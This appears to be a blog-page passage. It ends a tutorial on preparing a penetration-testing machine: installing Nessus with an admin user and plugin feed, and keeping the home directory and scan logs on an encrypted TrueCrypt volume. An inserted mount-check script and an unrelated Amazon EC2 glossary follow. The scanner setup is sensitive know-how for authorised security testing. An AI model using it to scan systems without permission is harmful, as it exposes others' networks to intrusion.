dpkg -i Nessus-4.0.2-ubuntu810_i386.deb

Things used to be a little more complicated for the client, but with the release of the pre-final version, it is just as easy as installing the server.

dpkg -i NessusClient-4.0.2-ubuntu810_i386.deb

Finally it’s time to configure Nessus. Execute each of the following and follow the prompts. My entries are below for fun.

#create server certificate
/opt/nessus/sbin/nessus-mkcert
This script will now ask you the relevant information to create the SSL
certificate of Nessus. Note that this information will *NOT* be sent to
anybody (everything stays local), but anyone with the ability to connect to your
Nessus daemon will be able to retrieve this information.
CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:US
Your state or province name [none]:Confused
Your location (e.g. town) [Paris]:Somewhere In Time
Your organization [Nessus Users United]:
.
.
.
Congratulations. Your server certificate was properly created.
.
.
# add user
/opt/nessus/sbin/nessus-adduser
Login :Me
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]:y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that Me has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login             : Me
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y]y
User added

We want to disable Nessus starting at boot. Some of the steps a little later on require that Nessus not be running at boot.
/usr/sbin/update-rc.d -f nessusd remove

This command does not remove the Nessus start scripts. It only removes the links that cause Nessus to start at boot time.

The next thing we need to do is register our installation so we can get the plugin feed. You need to go here and request a key. That is a link to the free feed for home use. Use appropriately.
Once you have your key, execute the following to update your plugins. Please note that there are two dashes before register in the nessus-fetch line below; they can display as one sometimes.

/opt/nessus/bin/nessus-fetch --register [your feed code here]

When that is done, and it is going to take a few minutes, you are ready to start the server and client. Be aware that with version 4.0, while the command to start returns quickly, the actual starting of the service may take a minute or two. In many cases, I have actually had to reboot before Nessus started working. You can use netstat -na to check that the server is listening on port 1241.

/etc/init.d/nessusd start
/opt/nessus/bin/NessusClient

Configure Encryption
Since we are using this tool to poke at people's networks and systems, with permission of course, it is very important that the information we find be protected. To do this, we are going to set up an encrypted volume that will eventually become our home directory.
This can be done with the gui or via command line. We will be using the gui because we need to be able to format the volume with ext3 and, as yet, I have not been able to figure out how to do that via the command line on linux.
[Screenshots: Truecrypt Configuration wizard, including the volume size and volume type steps]
You will get a message that the volume was successfully created. Click on the 'OK' button, then exit the Truecrypt gui, both the 'Create Volume' window and the main window. We want to be back at the command prompt at this point.
If you want to test your filesystem, execute the following (note that the -k '' is two single quotes, not a double quote):

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1
mount
cd /media/truecrypt1
df .

This will show that the volume is mounted and the amount of disk space you have left. Our next step is to have this volume mounted when we log in. We do this by editing the root user’s .profile file. Add the truecrypt command above to root’s .profile so it looks like this:

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

mesg n

The next time you reboot you will be asked for the password for the volume and it will be mounted for you.

Now it is time to tweak a few things.

Tweak a few things
The first thing we are going to do is go ahead and configure networking to start at boot time. It’s convenient and easy to disable if we need to. All we have to do is execute the following command.

/usr/sbin/update-rc.d networking defaults

The next thing we want to do is make sure all our tools and the system itself are up to date. First execute the following:

apt-get update

This updates the software repository information. Next, execute this command:

apt-get upgrade

The system will determine if there is anything that needs to be updated and then prompt you to continue. Individual packages can be updated by including the package name after upgrade.
This next bit is interesting and I was surprised it worked. We are going to reset the root user’s home directory during the login process to the mounted truecrypt volume. This will ensure that anything written to the home directory will be encrypted.  The following commands will set this up for us:

cd /media/truecrypt1
rsync -r --links /root/ .
# add the export HOME, export HISTFILE and cd lines shown below
vi /root/.profile

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

export HOME=/media/truecrypt1
export HISTFILE=/media/truecrypt1/.bash_history

cd

mesg n

:wq

The next time you reboot, when you are finally in the system, your home directory will be /media/truecrypt1.
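One thing the .profile above does not guard against: HOME and HISTFILE are redirected whether or not the truecrypt command actually succeeded, so a mistyped password or a missing container leaves the shell writing its history and files into the bare, unencrypted /media/truecrypt1 directory. The fragment below is an added example, not the post's own code; it keeps the post's paths and only redirects HOME after confirming the volume is really mounted (the helper names is_mounted, secure_home and apply_secure_home are ours).

```shell
#!/bin/sh
# Added example (not from the post): redirect HOME to the TrueCrypt volume
# only after verifying the mount exists. Paths follow the post; the helper
# names are ours.

ENC_CONTAINER=/my_secret_stuff
ENC_MOUNT=/media/truecrypt1

# is_mounted MOUNTPOINT MOUNT_TABLE
# MOUNT_TABLE is text in /proc/mounts format ("dev mountpoint fstype ...").
# Exact match on field 2, so a parent mount such as /media does not count.
is_mounted() {
    printf '%s\n' "$2" |
        awk -v mp="$1" '$2 == mp { found = 1 } END { exit found ? 0 : 1 }'
}

# secure_home MOUNTPOINT MOUNT_TABLE
# Prints the directory HOME should point at: the encrypted volume when it is
# mounted, otherwise /root so nothing secret lands on the bare mountpoint.
secure_home() {
    if is_mounted "$1" "$2"; then
        printf '%s\n' "$1"
    else
        printf '%s\n' /root
    fi
}

# Replacement for the post's export HOME / export HISTFILE / cd lines:
# mount if needed, re-read the live mount table, then decide where HOME goes.
apply_secure_home() {
    if ! is_mounted "$ENC_MOUNT" "$(cat /proc/mounts)"; then
        truecrypt -t -k '' --protect-hidden=no "$ENC_CONTAINER" "$ENC_MOUNT"
    fi
    HOME=$(secure_home "$ENC_MOUNT" "$(cat /proc/mounts)")
    export HOME
    HISTFILE=$HOME/.bash_history
    export HISTFILE
    if [ "$HOME" = /root ]; then
        echo "WARNING: $ENC_MOUNT is not mounted; HOME stays on the unencrypted disk" >&2
    fi
    cd "$HOME" || return 1
}

# Constructed sample mount table (not captured from a real system).
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /media tmpfs rw 0 0
/dev/mapper/truecrypt1 /media/truecrypt1 ext3 rw 0 0'

# Only an interactive shell (a real login) performs the redirect; when run
# as a plain script the sample table is evaluated instead.
case $- in
    *i*) apply_secure_home ;;
    *)   secure_home "$ENC_MOUNT" "$SAMPLE_MOUNTS" ;;   # prints /media/truecrypt1
esac
```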
There is one last thing we want to do. We want to change Nessus to log to the encrypted volume. This is very easy. The file that controls this is /opt/nessus/etc/nessus/nessusd.conf. We need to create a place for the log files to go, so execute the following:

cd /media/truecrypt1
mkdir -p nessus/logs

Once you have done that, edit the /opt/nessus/etc/nessus/nessusd.conf file and change this:

.
.
.
# Log file :
logfile = /opt/nessus/var/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /opt/nessus/var/nessus/logs/nessusd.dump
.
.
.

to this:

.
.
.
# Log file :
logfile = /media/truecrypt1/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /media/truecrypt1/nessus/logs/nessusd.dump
.
.
.

That’s it. You are all done now.

BackTrack links
Categories
Amazon Web Services AWS CLI Command Line EC2 Encryption Linux S3 SSL Windows

Glossary of Amazon EC2 terms

Amazon machine image (AMI)
An Amazon Machine Image (AMI) is an encrypted machine image stored in Amazon S3. It contains all the information necessary to boot instances of your software.

Amazon EBS
A type of storage that enables you to create volumes that can be mounted as devices by Amazon EC2 instances. Amazon EBS volumes behave like raw unformatted external block devices. They have user supplied device names and provide a block device interface. You can load a file system on top of Amazon EBS volumes, or use them just as you would use a block device.

Availability Zone
A distinct location within a region that is engineered to be insulated from failures in other Availability Zones and provides inexpensive, low latency network connectivity to other Availability Zones in the same region.

compute unit
An Amazon-generated measure that enables you to evaluate the CPU capacity of different Amazon EC2 instance types.

EBS
See Amazon EBS.

Elastic Block Store
See Amazon EBS.

elastic IP address
A static public IP address designed for dynamic cloud computing. Elastic IP addresses are associated with your account, not specific instances. Any elastic IP addresses that you associate with your account remain associated with your account until you explicitly release them. Unlike traditional static IP addresses, however, elastic IP addresses allow you to mask instance or Availability Zone failures by rapidly remapping your public IP addresses to any instance in your account.

ephemeral store
See instance store.

explicit launch permission
Launch permission granted to a specific user.

group
See security group.

instance store
Every instance includes a fixed amount of storage space on which you can store data. This is not designed to be a permanent storage solution. If you need a permanent storage system, use Amazon EBS.

instance type
A specification that defines the memory, CPU, storage capacity, and hourly cost for an instance. Some instance types are designed for standard applications while others are designed for CPU-intensive applications.

gibibyte (GiB)
A contraction of giga binary byte, a gibibyte is 2^30 bytes or 1,073,741,824 bytes. A gigabyte is 10^9 or 1,000,000,000 bytes. So yes, Amazon has bigger bytes.

image
See Amazon machine image.

instance
Once an AMI has been launched, the resulting running system is referred to as an instance. All instances based on the same AMI start out identical and any information on them is lost when the instances are terminated or fail.

instance store
The disk storage associated with an instance. In the event an instance fails or is terminated (not simply rebooted), all content on the instance store is deleted.

group
Also known as a security group, groups define firewall rules that can be shared among a group of instances that have similar security requirements. The group is specified at instance launch.

launch permission
AMI attribute allowing users to launch an AMI.

Linux
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

paid AMI
An AMI that you sell to other Amazon EC2 users. For more information, refer to the Amazon DevPay Developer Guide.

private IP address
All Amazon EC2 instances are assigned two IP addresses at launch: a private address (RFC 1918) and a public address that are directly mapped to each other through Network Address Translation (NAT).

public AMI
An AMI that all users have launch permissions for.

public data sets
Large public data sets that can be seamlessly integrated into AWS cloud-based applications. Amazon stores the data sets at no charge to the community and, like all AWS services, users pay only for the compute and storage they use for their own applications. These data sets currently include data from the Human Genome Project, the U.S. Census, Wikipedia, and other sources.

public IP address
All Amazon EC2 instances are assigned two IP addresses at launch: a private address (RFC 1918) and a public address that are directly mapped to each other through Network Address Translation (NAT).

region
A geographical area in which you can launch instances (e.g., US, EU).

reservation
A collection of instances started as part of the same launch request.

Reserved Instance
An additional Amazon EC2 pricing option. With Reserved Instances, you can make a low one-time payment for each instance to reserve and receive a significant discount on the hourly usage charge for that instance.

security group
A security group is a named collection of access rules. These access rules specify which ingress (i.e., incoming) network traffic should be delivered to your instance. All other ingress traffic will be discarded.

shared AMI
AMIs that developers build and make available for other AWS developers to use.

Solaris
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

snapshot
Amazon EBS provides the ability to create snapshots or backups of your Amazon EBS volumes and store them in Amazon S3. You can use these snapshots as the starting point for new Amazon EBS volumes and to protect your data for long term durability.

supported AMIs
These AMIs are similar to paid AMIs, except that you charge for software or a service that customers use with their own AMIs.

tebibyte (TiB)
A contraction of tera binary byte, a tebibyte is 2^40 bytes or 1,099,511,627,776 bytes. A terabyte is 10^12 or 1,000,000,000,000 bytes. So yes, Amazon has bigger bytes.

UNIX
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.

Windows
Amazon EC2 instances are available for many operating platforms, including Linux, Solaris, Windows, and others.